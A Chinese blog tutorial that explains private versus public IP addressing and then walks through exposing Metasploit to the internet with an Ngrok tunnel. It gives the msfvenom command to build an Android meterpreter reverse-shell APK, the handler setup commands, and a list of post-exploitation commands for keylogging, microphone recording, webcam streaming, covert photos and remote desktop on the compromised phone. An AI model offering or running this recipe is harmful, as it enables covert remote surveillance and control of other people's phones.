经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?……这主要是因为你的身处于内网之中不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧
什么是内网?内网接入方式:上网的计算机得到的IP地址是Inetnet上的保留地址,保留地址有如下3种形式:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x内网的计算机以NAT(网络地址转换)协议,通过一个公共的网关访问Internet内网的计算机可Internet上的其他计算机发送连接请求,但Internet上其他的计算机无法向内网的计算机发送连接请求什么是外网(也称为公网)?使用ADSL的用户,如果只有一个用户一台计算机在使用此宽带,没有使用路由功能,而是用拨号软件直接拨号上网的,这种情况下,该用户目前所处的网络为外网,外网的用户都拥有一个属于自己的独立IP地址.公网的计算机和Internet上的其他计算机可随意互相访问如何判断你是网络是内网还是外网呢?输入WIN+R进去MS-DOS命令行里面,输入:ipconfig看一下自己的ip:如果你的IP地址属于保留地址(保留地址开头为:10.x.x.x 172.16.x.x至172.31.x.x 192.168.x.x)那么你的计算机就是运行在局域网内今天给大家介绍一个简单方法让metsploit连入外网的方式,使用一个内网穿透工具Ngrok打开网址:https://www.ngrok.cc然后注册账号登录选择一个免费的隧道:据图配置本地端口,如果是kali我们需要输入ifconfig看一下自己的ip填进去然后找到自己刚刚开通的隧道,看一下自己的配置信息,这里的隧道id和隧道端口,服务器地址接下来要用的:下载自己对应的客户端,我用的是kali Linux所以选择了一个64位的Linux版本的下载之后你自己找一个目录放进去,然后在终端打开这个指定目录并输入命令:./sunny clientid 隧道id出现下面的转发成功界面就OK了(服务器地址和ip地址被我打码了,你们的电脑上可以看到的)连上外网之后的metsploit做渗透测试的时候就如鱼得水了比如你在局域网里面想要渗透一个手机需要让手机和电脑连在一个WiFi上面,但是现在就不需要了下面给大家来一个简单尝试吧打开metsploit控制台,输入下面的命令生成一个安卓木马(这是最简单最基础的生成方式了)msfvenom -p android/meterpreter/reverse_tcp LHOST=刚才创建的隧道服务器地址 LPORT=隧道端口 R >/root/muma.apk安装到自己的手机上,不要问为啥报毒
它就是一个简单的病毒
(免杀不是简单重点,以后会讲免杀技术)接下来输入下面的命令:(一句一句的输入)use exploit/multi/handler //加载模块set payload android/meterpreter/reverse_tcp //选择Payloadshow options //查看参数配置ip:这里的ip是kali本机的,和端口是刚才ngrok里自定义的本地端口最后如何exploit安卓机点一点病毒,就连上了,完全不用在同一局域网下面,手机用自己的4G网即可接下来就可以操控手机了keyscan_start:开始键盘记录keyscan_dump:下载键盘记录keyscan_stop:结束键盘记录record_mic:录制声音(如果目标主机上有话筒的话)webcam_chat:查看摄像头接口webcam_list:查看摄像头列表webcam_stream:获取摄像头视频run vnc:开启远程桌面webcam_stream 开启摄像头webcam_snap 隐秘拍照功能 -i 1 或者2是开启前置摄像头和后置摄像头的
(图片来源网络,侵删)
0 评论